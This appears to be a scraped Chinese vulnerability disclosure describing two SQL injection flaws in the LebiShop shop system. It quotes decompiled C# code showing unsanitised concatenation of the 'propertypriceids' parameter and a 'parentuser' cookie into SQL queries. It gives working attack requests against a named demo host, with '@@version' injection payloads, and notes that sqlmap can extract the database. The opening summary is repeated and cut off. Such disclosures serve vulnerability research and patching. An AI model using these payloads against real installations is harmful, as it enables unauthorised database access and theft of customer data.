VULHUB ™

### 简要描述： LebiShop商城系统最新版两处SQL注入二 ### 详细说明： LebiShop商城系统最新版两处SQL注入 第一处SQL注入 /ajax/ajax_user.aspx 对应反编译后的文件shop.ajax.ajax_user.UserProduct_Edit方法 ``` // Shop.Ajax.Ajax_user public void UserProduct_Edit() { int t = RequestTool.RequestInt("type", 141); int num = RequestTool.RequestInt("num", 1); int pid = RequestTool.RequestInt("pid", 0); string property = RequestTool.RequestString("property"); string propertypriceids = RequestTool.RequestString("propertypriceids"); int warndays = RequestTool.RequestInt("warndays", 0); if (t != 141 && t != 142 && t != 143 && t != 144) { base.Response.Write("{\"msg\":\"OK\"}"); return; } if ((t == 141 || t == 144) && this.CurrentUser.id == 0) { base.Response.Write(string.Concat(new string[] { "{\"msg\":\"", base.Tag("请先登陆"), "\",\"url\":\"", base.URL("P_Login", ""), "\"}" })); return; } EX_User.UserProduct_Edit(this.CurrentUser, pid, num, t, property, warndays, propertypriceids); ``` 注意这里的propertypriceids通过RequestTool.RequestString方法获取...

### 简要描述： LebiShop商城系统最新版两处SQL注入二 ### 详细说明： LebiShop商城系统最新版两处SQL注入 第一处SQL注入 /ajax/ajax_user.aspx 对应反编译后的文件shop.ajax.ajax_user.UserProduct_Edit方法 ``` // Shop.Ajax.Ajax_user public void UserProduct_Edit() { int t = RequestTool.RequestInt("type", 141); int num = RequestTool.RequestInt("num", 1); int pid = RequestTool.RequestInt("pid", 0); string property = RequestTool.RequestString("property"); string propertypriceids = RequestTool.RequestString("propertypriceids"); int warndays = RequestTool.RequestInt("warndays", 0); if (t != 141 && t != 142 && t != 143 && t != 144) { base.Response.Write("{\"msg\":\"OK\"}"); return; } if ((t == 141 || t == 144) && this.CurrentUser.id == 0) { base.Response.Write(string.Concat(new string[] { "{\"msg\":\"", base.Tag("请先登陆"), "\",\"url\":\"", base.URL("P_Login", ""), "\"}" })); return; } EX_User.UserProduct_Edit(this.CurrentUser, pid, num, t, property, warndays, propertypriceids); ``` 注意这里的propertypriceids通过RequestTool.RequestString方法获取 最后进入了EX_User.UserProduct_Edit函数，跟进 ``` // Shop.Bussiness.EX_User public static void UserProduct_Edit(Lebi_User CurrentUser, int pid, int num, int t, string property, int warndays, string propertypriceids) { string CookieName = "UserProduct" + t; Lebi_Product pro = EX_Product.GetProduct(pid); if (pro == null) { return; } if ((pro.Type_id_ProductType == 321 || pro.Type_id_ProductType == 322) & (DateTime.Now < pro.Time_Start || DateTime.Now > pro.Time_Expired)) { return; } if (CurrentUser.id <= 0) { NameValueCollection nv = CookieTool.GetCookie(CookieName); string key = "p" + pro.id.ToString(); property = HttpUtility.UrlEncode(property); string userproduct = nv.Get(key); if (string.IsNullOrEmpty(userproduct)) { nv.Add(key, num.ToString() + "|" + property); } else { nv.Set(key, num.ToString() + "|" + property); } CookieTool.WriteCookie(CookieName, nv, 1); return; } Lebi_User_Product upro = B_Lebi_User_Product.GetModel(string.Concat(new object[] { "user_id=", CurrentUser.id, " and product_id=", pid, " and type_id_UserProductType=", t })); decimal propertyprice = 0m; if (propertypriceids != "") { List<Lebi_ProPerty> ps = B_Lebi_ProPerty.GetList("id in (" + propertypriceids + ")", ""); foreach (Lebi_ProPerty p in ps) { propertyprice += p.Price; } } ``` 如果propertypriceids不为空 ``` B_Lebi_ProPerty.GetList("id in (" + propertypriceids + ")", ""); ``` propertypriceids进入了B_Lebi_ProPerty.GetList方法 而且propertypriceids在进入in条件语句时，没有进行处理 导致在GetList中propertypriceids没有处理，导致sql注入 发送请求： ``` http://demo.lebi.cn/ajax/ajax_user.aspx?__action=UserProduct_Edit&url=/ type=141&propertypriceids=@@version ``` [<img src="https://images.seebug.org/upload/201501/19230421ed5589a9a87800df36aa1b3154c2c19c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19230421ed5589a9a87800df36aa1b3154c2c19c.png) [<img src="https://images.seebug.org/upload/201501/19230437b850f27a66764a8cffe75d43de0d1edd.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/19230437b850f27a66764a8cffe75d43de0d1edd.png) 使用SQLmap即可跑出数据 第二处SQL注入 ``` // Shop.Ajax.Ajax_user public void User_Reg() { string verifycode = RequestTool.RequestString("verifycode"); string code = CookieTool.GetCookieString("CheckCodef"); if (code != verifycode) { base.Response.Write("{\"msg\":\"" + base.Tag("验证码错误") + "\"}"); return; } string UserName = RequestTool.RequestString("UserName"); string PWD = RequestTool.RequestString("Password"); int count = B_Lebi_User.Counts("UserName='" + UserName + "'"); if (count > 0) { base.Response.Write("{\"msg\":\"" + base.Tag("用户名已注册") + "\"}"); return; } NameValueCollection nv = CookieTool.GetCookie("parentuser"); int parentuserid = 0; if (!string.IsNullOrEmpty(nv.Get("id"))) { string parentuserid_ = nv.Get("id"); Lebi_User puser = B_Lebi_User.GetModel("id=" + parentuserid_); if (puser != null && this.SYS.IsUsedAgent == "1" && B_API.Check("plugin_agent")) { parentuserid = puser.id; puser.Count_sonuser++; B_Lebi_User.Update(puser); } } ``` 注意这里 nv = CookieTool.GetCookie("parentuser"); 从cookie中获取parentuser的值 然后如果nv中存在id的键值，则 parentuserid_ = nv.Get("id"); 最后parentuserid_进入B_Lebi_User.GetModel("id=" + parentuserid_); 由于在GetModel中，id= parentuserid_，没有处理，也没有单引号保护，导致sql注入 在发送请求 ``` http://demo.lebi.cn/ajax/ajax_user.aspx?__Action=User_Reg&url=/ UserName=111111asdf&Password=111111&Password1=111111&Email=111111%40111.com&verifycode=02025&RealName=&Sex=%E7%94%B7&Birthday=&MobilePhone=&Phone=&Fax=&QQ= ``` 设置cookie ``` parentuser=id=1 and id=@@version ``` [<img src="https://images.seebug.org/upload/201501/1923203734ae20c711980edae11d5a3be287824f.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1923203734ae20c711980edae11d5a3be287824f.png) ### 漏洞证明：